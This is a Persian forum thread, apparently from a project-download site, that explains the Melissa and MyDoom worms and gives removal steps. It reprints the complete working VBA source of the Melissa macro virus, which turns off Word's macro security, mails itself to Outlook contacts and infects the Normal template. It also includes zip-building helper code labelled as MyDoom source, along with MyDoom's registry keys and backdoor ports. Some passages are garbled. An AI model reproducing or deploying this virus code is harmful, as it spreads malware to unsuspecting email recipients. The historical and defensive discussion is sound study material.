ارسال پاسخ 
 
امتیاز موضوع:
  • 1 رأی - میانگین امتیازات: 5
  • 1
  • 2
  • 3
  • 4
  • 5
ساختار ویروسها و برنامه های مخرب کامپیوتری
06-05-2017, 10:04 AM (آخرین ویرایش در این ارسال: 11-07-2019 11:51 AM، توسط ali.)
ارسال: #21
RE: ساختار ویروسها و برنامه های مخرب کامپیوتری
دانلود فایل WORD قالب DOCX تعداد 500 صفحه کامل در مورد ویروسها و آنتی ویروس ها برای دانلود کلیک فرمائید . . .
Smithبا حداکثر جریمه 480000دلار و40سال زندان طبق گفته Paul Loriquetسخنگوی دفاتر عمومی وکلای نیوجرسی محکوم شد. با تکمیل تحقیقات دفتر عمومی وکالت به هیات منصفه ایالت دلایلی را می فرستند تا دادگاه در کیفر خواست وی تصمیم بگیرد.
2-6-نتیجه گیری
ملیسا بر این تاکید دارد که سازمان ها باید رمزدار کردن تمام ایمیل ها را متوقف کنند. وقتی پیام ها رمزدار شدند نرم افزار آنتی ویروس محتویات آن را نمی تواند بخواند وبنابراین نمی تواند تعیین کند که آیا دارای ویروس های ایمیلی مثل ملیسا هستند یا نه. مردم نیاز به رضایتمندی بیشتردارند رمز دار کردن تمام ایمیل ها آیا لازم است؟ شاید آنها فقط مهمترین ایمیل ها را رمز دار کنند. البته متخصصین ویروس می گویند کاربران باید مراقب باشند مثلا در استفاده وبروزرسانی نرم افزار های آنتی ویروس.
Carpenterمی گوید: وقتی ایمنی مورد توجه زیاد نشریات قرارمی گیرد من فکر می کنم هنوز افراد زیادی وجود دارند که اولویت لازم را به این موضوع نمی دهند. کاربران میزان مشکل را درک نمی کنند ومتوجه سرمایه گذاری های لازم برای محافظت نیستند.
2-7-سورس کد ویروس ملیسا

کد:
"Melissa" virus source code

This is the source code (in VBS) of the Duke/SMF variant of the virus "Melissa" written by Kwyjibo, which started spreading on Friday, March 26, 1999.

Private Sub AutoOpen()
On Error Resume Next
p$ = "clone"
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
p$ = "clone"
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") <> "... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " & Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don't show anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
p$ = "clone"
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\", "Melissa?") = "... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
p$ = "clone"
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name, "Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False) Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Clone written by Duke/SMF
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points, plus triple-word-score, plus fifty points for using all my letters. Game's over. I'm outta here."
End Sub








--------------------------------------------------------------------------------
2-8-روش پاکسازی ویروس ملیسا
کشف شده: 26 مارچ 1999
آپدیت شد: 13 فوریه 2007
شناخته شده: W95 M.melissa
نوع: ماکرو
سیستم های تاثیر پذیر: ویندوز 2000 ، ویندوز 95 ، ویندوز 98 ، ویندوز ME ، ویندوز NT ، ویندوز XP ملیسا یک ویروس هاکروی معمولی است که یک Payload غیر عادی دارد.
موضوع پیغام ملیسا هست.
Importani Message From username
اجرا کردن ابزار و حذف کردن ویروس:
Live updete تان راRun کنید و مطمئین شوید شما تعاریف ویروس اخیر تان را دارید.
1- آنتی ویروس نورتون را شروع کنیدو مطمئن شوید که NAV
Norton Anti Virus)) برای اسکن کردن همه فایل ها ترکیب بندی شده است.
2-Scan را به طور کامل اجرا کنید.
3- اگر هر فایلی به عنوان آلودگی با ملیسا نمایان شد روی Repair کلیک کنید.
چرا باید ملیسا را حذف کنید؟
حذف به صورت دستی یک فرآیند مشکل است و توصیه نمی شود مگر اینکه شما در این زمینه خبره باشد بنا بر این بهترین دفاع دانلو کردن و نصب یک برنامه Anti- Spyware قابل اعتماد برای Scan کردن ملیسا Spyware های دیگر روی ماشین تان است. (به منظور نمایان کردن ملیسا به آسانترین و سریع ترین راه ممکن ما توصیه می کنیم.Spyhunter Scanner را فراهم کنید)
حذف کردن ملیسا به صورت دستی:
برای کشتن فرآیند های ملیسا، Cirl +all +delete را فشار دهید تا پنجره Task manager باز شود روی Processes Tab کلیک کنید وبرای ملیسا جستجو کنید، آنگاه کلیک راست کنید و End process را انتخاب کنید.
شما همچنین نیاز دارید کلید های رجیستری ملیسا را حذف کنید برای حذف کلیدهای رجیستری روی Start در پایین کلیک کنید Run را انتخاب کنید تا پنجره Registry Editor باز شود. یک پنجره نمایان می شود. Regedit را درونBox تایپ کنید ورودی OK کلیک کنید.
برای کلید رجیستری، جستجو کنید.
Hkey_Local_Machine/software/Melissa
کلیک راست کنیدو Delete را انتخاب کنید.

فصل سوم-آنالیز کرم MyDoom
3-1-بررسي عملكرد كرم Mydoom

در ساعت نه روز چهارشنبه 28 ژانويه 2004 مطابق با هشتم بهمن 1382، شركت مايكروسافت بررسي لازم در خصوص گزارشات دريافتي مبني بر شيوع يك كرم جديد با نام Mydoom و يا Novarg و Mimail _R شناخته شده با نام Mydoom.B را آغاز نمود. بر اساس گزارشات دريافتي، كرم فوق امكان دستيابي به برخي وب سايت ها نظير تعدادي از وب سايت هاي مايكروسافت را سلب مي نمايد. كرم فوق، تلاش مي نمايد كه گيرندگان نامه هاي الكترونيكي را گمراه و آنان را تشويق به باز نمودن پيامي نمايد كه داراي يك فايل ضميمه است. در صورت فعال شدن فايل ضميمه، كرم Mydoom.B كدهاي مخرب را بر روي كامپيوتر كاربر نصب و نسخه اي از خود را براي تمامي افراد موجود در ليست دفترچه آدرس كاربر، ارسال مي نمايد . محصولاتي كه متاثر از كرم فوق مي باشند، عبارتند از:

• Microsoft Outlook
• Microsoft Outlook Express
• Web –based e-mail programs
در قالب فرستنده يك آدرس تصادفي از سايتهاي AOL، MSN، Yahoo و Hotmail به چشم مي خوردومعمولا در بخش موضوع نامه هاي ارسالي عناويني مانند عبارتهاي زير مشاهده مي شود:
کد:
Undeliverable : error / undeliverable : hil / undeliverable ; test/
Mail Transaction / Mail Delivery system / Mail transaction failed /
Error / hello / Delivery Error / unable to deliver the message /
Server Report / Status / Returned Mail / Test /Failed / Random characters
محتواي متن نامه ها حاوي مواردي چون:
کد:
-[ random characters ]
-Test
-The message cannot be represented in 7-bit ASCII encoding and has been sent as a binary attachment .
-Sendmail daemon reported : Error #804 occurred during SMTP session . partial message has been received .
-The message contains Unicode characters and has been sent as a binary attachment .
-The message contains MIME – encoded graphics and has been sent as a binary attachment .
-Mail transaction failed . partial message is available .
فايل ضميمه كه حاوي فايل اجرايي كرم است به شكل زير است:
{ body , doc , text , document , data , file ,readme, message } . { exe , bat , scr , cmd , pif }
ناگفته نماند كه اين كرم از طريق شبكه هاي p2p نيز منتقل مي شود. به گزارش مركز تحقيقات mail filtering ميزان انتشار اين كرم بسيار بالا و حدودا از هر 12 ايميل ارسالي يكي را در بر ميگيرد. آخرين كرمي كه توانسته بود به سرعتي بالا در انتشار دست يابد sobig-f بود كه از هر 17 ايميل يكي را در بر مي گرفت. گفته مي شود اين كرم در روسيه متولد شده است. به نوشته z-virus اين كرم به گونه اي طراحي شده كه پيام آلوده براي نشاني هايي چون yahoo,MSN و مايكروسافت و ديگر دامنه هاي مشهوري كه از سيستم هاي شناسايي سريع نرم افزار هاي مخرب برخوردارند ارسال نشود.


3-2-تاثيرات اين كرم بر روي ویندوز
تاثیرات این کرم برروی سیستم شامل:
درمسیر پوشه ویندوز. Ctfmon.dllوExplorer.exeایجاد دو فایل به نامهای
:Explorer.Exe
ایجاد شده اشت.بر خلاف C:\$windows\system3 در ريشه MyDoom.Bتوسط سیستم اجرا شده است کهstarttupصحیح این فایل در c:\$windows\explorer.exe
دوباره مقداردهی شده وویروس رااجرامیکند.
ویندوز داراي فايلي با نام explorer.exe در پوشه پيش فرض خود است. فايل دوم نيز همنام يكي از فايلهايي است كه با نرم افزار Office نصب مي شود.
Ctfmon.dll:
فایل Ctfmon.dll توسط کرم Mydoom در ریشه C:\$windiws\system32 ایجاد شده است ودر پردازش windows Explorer تزریق شده است.این باعث میشود کرم در حافظه بدون لیست شدن در لیست پردازش ها در ویندوز باقی بماند.


==================================================
طراحی وب سایت
پروژه های برنامه نویسی تجاری
دانلود پروژه های ASP.NET وب سایتهای آماده به همراه توضیحات
دانلود پروژه های سی شارپ و پایگاه داده SQL Server همراه توضیحات و مستندات
دانلود پروژه های UML نمودار Usecase نمودار class نمودرا activity نمودار state chart نمودار DFD و . . .
دانلود پروژه های حرفه ای پایگاه داده SQL Server به همراه مستندات و توضیحات
پروژه های حرفه ای پایگاه داده Microsoft access به همراه مستندات و توضیحات
دانلود پروژه های کارآفرینی
دانلود گزارشهای کارآموزی کارورزی تمامی رشته های دانشگاهی
قالب تمپلیت های آماده وب سایت ASP.NET به همراه Master page و دیتابیس
برنامه های ایجاد گالری عکس آنلاین با ASP.NET و JQuery و اسلایدشو به همراه کد و دیتابیس SQL کاملا Open Source واکنشگرا و ساده به همراه پایگاه داده
==================================================
یافتن تمامی ارسال‌های این کاربر
نقل قول این ارسال در یک پاسخ
06-05-2017, 10:06 AM
ارسال: #22
RE: ساختار ویروسها و برنامه های مخرب کامپیوتری
• تغيير فايل HOSTS: اين فايل مرجع اوليه ويندوز براي Name Resolution مي باشد كه در مسير زير قرار دارد:
%winDir%\system32\drivers\etc\hosts
اعمال تغييرات زير در رجیستری ويندوز(اين تغييرات جهت اجراي كرم حين شروع به کار سيستم اعمال مي شود. بنابر اين با متغير مربوطه از مسير رجيستري زير،كرم اجرا نخواهد شد.)
کد:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\ CurrentVertion\Run
متغير و مقدار ايجاد شده توسط كرم :
کد:
''Explorer"="%System%\exp1orer.exe"
HKEY_CLASSES_ROOT\CLSID\{E6FB5E20-DE35-11CF-9C87- 00AA005127ED}\Inprocserver32
• تاثيرات شبكه اي :
-كرم بلافاصله پس از نصب اقدام به ارسال ايميل به تمامي آدرسهاي موجود در كامپيوتر ميزبان مي كند. اين مساله دو تاثير خواهد داشت:
1.تكثير كرم از طريق Address Book كامپيوتر ميزبان:
2.بعضي از سرورهاي ايمیل داراي برنامه هاي ضد ويروس هستند و جلوي ارسال ايمیلهاي مخرب را مي گيرند. همين مساله خود مي تواند مشكل ساز باشد. همانطور كه اشاره شد اين كرم آدرس مبدا را جعلي انتخاب مي كند (Source spoofing ) بنابراين ممكن است ايميل برگشتي از سرور كه خود حاوي كرم است به يك آدرس ديگر ارسال شود و شخص ديگري را آلوده سازد.
-ايجاد يك backdoor بر روي يكي از پورتهاي 10080، 8080، 80، 3128، 1080. از اين Backdoor ممكن است بعدا جهت دسترسي به اطلاعات كامپيوتر ميزبان استفاده شود.
- پويش سيستمهايي كه پورت TCPشماره 3127 بر روي آنها باز است . (علت اين قضيه دقيقا مشخص نيست ولي همين امر مي تواند بر ترافيك شبكه بيافزايد (.
كرم از اول فوريه 2004 شروع به حمله DDoS عليه سایت مايكروسافت كرد.
يكي ديگر از عوارض اين كرم اجراي نا به هنگام و ناخواسته نرم افزار Notepad است. در اين حالت Notepad از كاراكترهاي نا مفهوم پر مي شود. به جز موارد اشاره شده اگر تاریخ دستگاه بين 12 تا 23 بهمن باشد كرم اقدام به حمله به سايت Sco از طريق حمبه DoS مي كند. اين كار باعث مي شود سايت مذكور براي مدتي از كار بيفتد . گونه هاي مختلفي از اين كرم در سالهاي 2005 و 2006 نيز منتشر شده است.
گونهB My Doom دو روز پس از رها سازي قبلي آن يعني MyDoom.A ظاهر شد. ويروس ايميلي با انتشار بالاي My Doom نشاندهنده ويژگي هاي ويروس هاي ایميلي قبلي است. با اين وجود ويروس My Doom يكي از آلوده كننده ترين هاست. علاوه بر آلودگي ميزبان بوسيله اجراي ويروس توسط كاربر از يك ضميمه ايميلي آلوده.
My Doom.B به سرعت explorer .exe را در C:\$windows\system32\directory قرار داده و بدقت مراقب است كه آن را در فايل قانوني و صحيح ويندوز C:\$windows\explorer.exe قرار ندهد بعلاوه اين كرم فايل زير را نيز ايجاد مي كند C:\$windows\system32\ctfmon.dll چون فايل هاي DATويروس قبلي بدنبال فايل هاي My Doom. A هستند My Doom. B تا زمانيكه شبكه قادر به بروز رساني فايل DAT خود شود تا آنها را در برابر My Doom. A محافظت كند، My Doom. B سريعا آلوده مي كند.
3-3-سورس کد کرم MyDoom
کد:
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#pragma pack(push, 1)
struct zip_header_t {
    DWORD signature;        /* 0x04034b50 */
    WORD ver_needed;
    WORD flags;
    WORD method;
    WORD lastmod_time;
    WORD lastmod_date;
    DWORD crc;
    DWORD compressed_size;
    DWORD uncompressed_size;
    WORD filename_length;
    WORD extra_length;
};
struct zip_eod_t {
    DWORD signature;        /* 0x06054b50 */
    WORD disk_no;
    WORD disk_dirst;
    WORD disk_dir_entries;
    WORD dir_entries;
    DWORD dir_size;
    DWORD dir_offs;
    WORD comment_len;
};

struct zip_dir_t {
    DWORD signature;    /* 0x02014b50 */
    WORD made_by;
    WORD ver_needed;
    WORD flags;
    WORD method;
    WORD lastmod_time;
    WORD lastmod_date;
    DWORD crc;
    DWORD compressed_size;
    DWORD uncompressed_size;
    WORD filename_length;
    WORD extra_length;
    WORD comment_length;
    WORD disk_no;
    WORD internal_attr;
    DWORD external_attr;
    DWORD local_offs;
};
#pragma pack(pop)



/* crc32.c -- compute the CRC-32 of a data stream
* Copyright (C) 1995 Mark Adler
* For conditions of distribution and use, see copyright notice in zlib.h
*/
/* $Id: crc32.c,v 1.5 1996/01/13 14:55:12 spc Exp $ */

static const unsigned long crc_table[] = {
  0x00000000L, 0x77073096L, 0xee0e612cL, 0x990951baL, 0x076dc419L,
  0x706af48fL, 0xe963a535L, 0x9e6495a3L, 0x0edb8832L, 0x79dcb8a4L,
  0xe0d5e91eL, 0x97d2d988L, 0x09b64c2bL, 0x7eb17cbdL, 0xe7b82d07L,
  0x90bf1d91L, 0x1db71064L, 0x6ab020f2L, 0xf3b97148L, 0x84be41deL,
  0x1adad47dL, 0x6ddde4ebL, 0xf4d4b551L, 0x83d385c7L, 0x136c9856L,
  0x646ba8c0L, 0xfd62f97aL, 0x8a65c9ecL, 0x14015c4fL, 0x63066cd9L,
  0xfa0f3d63L, 0x8d080df5L, 0x3b6e20c8L, 0x4c69105eL, 0xd56041e4L,
  0xa2677172L, 0x3c03e4d1L, 0x4b04d447L, 0xd20d85fdL, 0xa50ab56bL,
  0x35b5a8faL, 0x42b2986cL, 0xdbbbc9d6L, 0xacbcf940L, 0x32d86ce3L,
  0x45df5c75L, 0xdcd60dcfL, 0xabd13d59L, 0x26d930acL, 0x51de003aL,
  0xc8d75180L, 0xbfd06116L, 0x21b4f4b5L, 0x56b3c423L, 0xcfba9599L,
  0xb8bda50fL, 0x2802b89eL, 0x5f058808L, 0xc60cd9b2L, 0xb10be924L,
  0x2f6f7c87L, 0x58684c11L, 0xc1611dabL, 0xb6662d3dL, 0x76dc4190L,
  0x01db7106L, 0x98d220bcL, 0xefd5102aL, 0x71b18589L, 0x06b6b51fL,
  0x9fbfe4a5L, 0xe8b8d433L, 0x7807c9a2L, 0x0f00f934L, 0x9609a88eL,
  0xe10e9818L, 0x7f6a0dbbL, 0x086d3d2dL, 0x91646c97L, 0xe6635c01L,
  0x6b6b51f4L, 0x1c6c6162L, 0x856530d8L, 0xf262004eL, 0x6c0695edL,
  0x1b01a57bL, 0x8208f4c1L, 0xf50fc457L, 0x65b0d9c6L, 0x12b7e950L,
  0x8bbeb8eaL, 0xfcb9887cL, 0x62dd1ddfL, 0x15da2d49L, 0x8cd37cf3L,
  0xfbd44c65L, 0x4db26158L, 0x3ab551ceL, 0xa3bc0074L, 0xd4bb30e2L,
  0x4adfa541L, 0x3dd895d7L, 0xa4d1c46dL, 0xd3d6f4fbL, 0x4369e96aL,
  0x346ed9fcL, 0xad678846L, 0xda60b8d0L, 0x44042d73L, 0x33031de5L,
  0xaa0a4c5fL, 0xdd0d7cc9L, 0x5005713cL, 0x270241aaL, 0xbe0b1010L,
  0xc90c2086L, 0x5768b525L, 0x206f85b3L, 0xb966d409L, 0xce61e49fL,
  0x5edef90eL, 0x29d9c998L, 0xb0d09822L, 0xc7d7a8b4L, 0x59b33d17L,
  0x2eb40d81L, 0xb7bd5c3bL, 0xc0ba6cadL, 0xedb88320L, 0x9abfb3b6L,
  0x03b6e20cL, 0x74b1d29aL, 0xead54739L, 0x9dd277afL, 0x04db2615L,
  0x73dc1683L, 0xe3630b12L, 0x94643b84L, 0x0d6d6a3eL, 0x7a6a5aa8L,
  0xe40ecf0bL, 0x9309ff9dL, 0x0a00ae27L, 0x7d079eb1L, 0xf00f9344L,
  0x8708a3d2L, 0x1e01f268L, 0x6906c2feL, 0xf762575dL, 0x806567cbL,
  0x196c3671L, 0x6e6b06e7L, 0xfed41b76L, 0x89d32be0L, 0x10da7a5aL,
  0x67dd4accL, 0xf9b9df6fL, 0x8ebeeff9L, 0x17b7be43L, 0x60b08ed5L,
  0xd6d6a3e8L, 0xa1d1937eL, 0x38d8c2c4L, 0x4fdff252L, 0xd1bb67f1L,
  0xa6bc5767L, 0x3fb506ddL, 0x48b2364bL, 0xd80d2bdaL, 0xaf0a1b4cL,
  0x36034af6L, 0x41047a60L, 0xdf60efc3L, 0xa867df55L, 0x316e8eefL,
  0x4669be79L, 0xcb61b38cL, 0xbc66831aL, 0x256fd2a0L, 0x5268e236L,
  0xcc0c7795L, 0xbb0b4703L, 0x220216b9L, 0x5505262fL, 0xc5ba3bbeL,
  0xb2bd0b28L, 0x2bb45a92L, 0x5cb36a04L, 0xc2d7ffa7L, 0xb5d0cf31L,
  0x2cd99e8bL, 0x5bdeae1dL, 0x9b64c2b0L, 0xec63f226L, 0x756aa39cL,
  0x026d930aL, 0x9c0906a9L, 0xeb0e363fL, 0x72076785L, 0x05005713L,
  0x95bf4a82L, 0xe2b87a14L, 0x7bb12baeL, 0x0cb61b38L, 0x92d28e9bL,
  0xe5d5be0dL, 0x7cdcefb7L, 0x0bdbdf21L, 0x86d3d2d4L, 0xf1d4e242L,
  0x68ddb3f8L, 0x1fda836eL, 0x81be16cdL, 0xf6b9265bL, 0x6fb077e1L,
  0x18b74777L, 0x88085ae6L, 0xff0f6a70L, 0x66063bcaL, 0x11010b5cL,
  0x8f659effL, 0xf862ae69L, 0x616bffd3L, 0x166ccf45L, 0xa00ae278L,
  0xd70dd2eeL, 0x4e048354L, 0x3903b3c2L, 0xa7672661L, 0xd06016f7L,
  0x4969474dL, 0x3e6e77dbL, 0xaed16a4aL, 0xd9d65adcL, 0x40df0b66L,
  0x37d83bf0L, 0xa9bcae53L, 0xdebb9ec5L, 0x47b2cf7fL, 0x30b5ffe9L,
  0xbdbdf21cL, 0xcabac28aL, 0x53b39330L, 0x24b4a3a6L, 0xbad03605L,
  0xcdd70693L, 0x54de5729L, 0x23d967bfL, 0xb3667a2eL, 0xc4614ab8L,
  0x5d681b02L, 0x2a6f2b94L, 0xb40bbe37L, 0xc30c8ea1L, 0x5a05df1bL,
  0x2d02ef8dL
};

#define CRC32(c, b) (crc_table[((int)(c) ^ (b)) & 0xff] ^ ((c) >> 8))
#define DO1(buf)  crc = CRC32(crc, *buf++)
#define DO2(buf)  DO1(buf); DO1(buf)
#define DO4(buf)  DO2(buf); DO2(buf)
#define DO8(buf)  DO4(buf); DO4(buf)

unsigned long crc32(crc, buf, len)
    register unsigned long crc;           /* crc shift register */
    register const unsigned char *buf;    /* pointer to bytes to pump through */
    int len;                 /* number of bytes in buf[] */
/* Run a set of bytes through the crc shift register.  If buf is a NULL
   pointer, then initialize the crc shift register contents instead.
   Return the current crc in either case. */
{
  if (buf == NULL) return 0L;

  crc = crc ^ 0xffffffffL;
#ifndef NO_UNROLLED_LOOPS
  while (len >= 8) {
    DO8(buf);
    len -= 8;
  }
#endif
  if (len) do {
    DO1(buf);
  } while (--len);
  return crc ^ 0xffffffffL;     /* (instead of ~c for 64-bit machines) */
}


static void zip_putcurtime(WORD *f_time, WORD *f_date)
{
    SYSTEMTIME systime;

    GetSystemTime(&systime);
    if ((systime.wYear < 1999) || (systime.wYear > 2010))
        systime.wYear = 2004;
    if (systime.wMonth < 1 || systime.wMonth > 12) systime.wMonth = 1;
    if (systime.wDay < 1 || systime.wDay > 31) systime.wDay = 10;

    *f_date =
        ((systime.wYear-1980) << 9) |
        (systime.wMonth << 5) |
        systime.wDay;

    *f_time =
        (systime.wHour << 11) |
        (systime.wMinute << 5) |
        (systime.wSecond / 2);
}

static unsigned long zip_calc_crc32(HANDLE hFileIn)
{
    unsigned long reg, i;
    unsigned char buf[1024];
    SetFilePointer(hFileIn, 0, NULL, FILE_BEGIN);
    for (reg=0;;) {
        i = 0;
        if (ReadFile(hFileIn, buf, sizeof(buf), &i, NULL) == 0) break;
        if (i == 0) break;
        reg = crc32(reg, buf, i);
    }
    SetFilePointer(hFileIn, 0, NULL, FILE_BEGIN);
    return reg;
}

int zip_store(char *in, char *out, char *store_as)
{
    HANDLE hFileIn, hFileOut;
    struct zip_header_t hdr1;
    struct zip_eod_t eod1;
    struct zip_dir_t dir1;
    char buf[1024];
    unsigned long i, j, offs;

    hFileIn = CreateFile(in, GENERIC_READ, FILE_SHARE_READ|FILE_SHARE_WRITE,
        NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFileIn == INVALID_HANDLE_VALUE || hFileIn == NULL)
        return 1;
    hFileOut = CreateFile(out, GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE,
        NULL, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL, NULL);
    if (hFileOut == INVALID_HANDLE_VALUE || hFileOut == NULL) {
        CloseHandle(hFileIn);
        return 2;
    }

    memset(&hdr1, '\0', sizeof(hdr1));
    memset(&dir1, '\0', sizeof(dir1));
    memset(&eod1, '\0', sizeof(eod1));
    offs = 0;

    hdr1.signature = 0x04034b50;
    dir1.ver_needed = hdr1.ver_needed = 10;
    dir1.flags = hdr1.flags = 0;
    dir1.method = hdr1.method = 0;
    zip_putcurtime(&hdr1.lastmod_time, &hdr1.lastmod_date);
    dir1.lastmod_time = hdr1.lastmod_time;
    dir1.lastmod_date = hdr1.lastmod_date;
    hdr1.crc = zip_calc_crc32(hFileIn);
    dir1.crc = hdr1.crc;

    hdr1.compressed_size = GetFileSize(hFileIn, NULL);
    dir1.compressed_size = hdr1.compressed_size;
    hdr1.uncompressed_size = GetFileSize(hFileIn, NULL);
    dir1.uncompressed_size = hdr1.uncompressed_size;
    hdr1.filename_length = lstrlen(store_as);
    dir1.filename_length = hdr1.filename_length;
    dir1.extra_length = hdr1.extra_length = 0;

    dir1.local_offs = offs;

    WriteFile(hFileOut, &hdr1, sizeof(hdr1), &i, NULL);
    offs += sizeof(hdr1);
    WriteFile(hFileOut, store_as, lstrlen(store_as), &i, NULL);
    offs += lstrlen(store_as);
    SetFilePointer(hFileIn, 0, NULL, FILE_BEGIN);
    for (;;) {
        i = 0;
        if (ReadFile(hFileIn, buf, sizeof(buf), &i, NULL) == 0) break;
        if (i == 0) break;
        WriteFile(hFileOut, buf, i, &j, NULL);
        offs += i;
    }

    eod1.dir_offs = offs;

    dir1.signature = 0x02014b50;
    dir1.made_by = 20;        /* MSDOS, PKZIP 2.0 */
    dir1.internal_attr = 0;
    dir1.external_attr = 0x20;    /* FA_ARCHIVE */
    WriteFile(hFileOut, &dir1, sizeof(dir1), &i, NULL);
    offs += sizeof(dir1);
    WriteFile(hFileOut, store_as, lstrlen(store_as), &i, NULL);
    offs += lstrlen(store_as);

    eod1.signature = 0x06054b50;
    eod1.disk_no = 0;
    eod1.disk_dirst = 0;
    eod1.disk_dir_entries = 1;
    eod1.dir_entries = eod1.disk_dir_entries;
    eod1.dir_size = offs - eod1.dir_offs;
    eod1.comment_len = 0;
    WriteFile(hFileOut, &eod1, sizeof(eod1), &i, NULL);

    CloseHandle(hFileOut);
    CloseHandle(hFileIn);
    return 0;
}
3-4-روش هاي پاكسازي ويروس My doom
كشف شده: 26 ژانويه 2004
آپديت شده: فوريه 2007
همچنين شناخته شده: w32.Novarge.a@mm
WORM-MIMAIL.R[Trend],W32/Mydoom@MM [McAfee]
I-Warm.Novarg [kaspersky],win32.My doom . A[computer Assoc]
نوع: كرم
سيستم هاي تاثير پذير: windows 2000 ، windows 95 ، windows98 ، windows Me ، windows NT ، windows server 2003 ، windows Xp .
حذف کردن با استفاده از ابزار حذف:
Symantec security response ابزار حذف را براي تميز كردن اثر w32My doom توسعه داده است.اين روش ابتدايي در اغلب موارد است.
حذف کردن به صورت دستی:
اگر نمي توانيد ابزار حذف را فراهم كنيد يك حذف دستي انجام دهيد.
دستورالعمل هاي بعدی مربوط به همه انواع فرآوردههاي آنتي ويروس سيمانتيك است:
1. Disable system restore (windows xp/me)
2. Update the virus definitions .
3. Restart the computer in safe mode or VGA mode
4. Run a full system scan and delete all the files detected as w32mydoom.a@mm .
5. Delete the values that were added to the registry .
براي جزئيات خاص روي هر يك از اين step ها دستور العمل هايي كه در دنبال آمده است را بخوانيد.
1.غیرفعال کردن system restore:
اگر شما ويندوز Me يا Xp ر اجرا ميكنيد ما توصيه مي كنيم شما System Restor را به طور موقت خاموش كنيد.ويندوز Me/Xp از اين تركيب استفاده مي كند. كه فعال مي شود با يك مقدار اوليه و فايلها را در موارد كه انها خراب شده باشند به كامپيوتر تان بر ميگرداند.اگر يك ويروس،كرم يا تروجان روي يك كامپيوتر اثر كند System Restore ممكن است از آن ويروس تروجان يا كرم back up بگيرد.
ويندوز از برنامه هاي بيروني جلوگيري مي كند شامل برنامه هاي ضد ويروس واز تغيير دادن System Restor بنابراين برنامه هاي آنتي ويروس يا ابزارها نمي توانند تهديدات را از پوشه System Restore حذف كنند. در نتيجه System Restore پتانسيل بازگرداندن فايل آلوده روي كامپيوتر را دارد حتي بعد از اينكه شما فايل هاي آلوده را از همه محل هاي ديگر تميز كرده باشيد.همچنين يك اسكن ويروس ممكن است يك تهديدي را نمايان كند در پوشه System Restore حتي اگر چه شما آن تهديد را برداشته باشيد.
2.آپديت كردن تعاريف ويروس:
Symantec security response به طور كامل همه تعاريف ويروس را آزمايش مي كند.
براي اطمينان بالا قبل از اينكه آن ها به سرور ما پست شود دو را براي بدست اوردن تعاريف بيشتر براي ويروس وجود دارد.
اجرا كردنLive Update : كه آسانترين راه براي بدست آوردن تعاريف ويروس است.
اين تعاريف ويروس هر يكبار در هر هفته (معمولا چهارشنبه ها ) به سرورهاي Live Update پست مي شود.مگر اينكه يك ويروس مهم شيوع پيدا كرده باشد.
آپديت كردن تعاريف ويروس با استفاده از intellignet updater:تعاريف ويروس intelligent updater در روزهاي كاري ( دوشنبه تا جمعه ) پست مي شود.
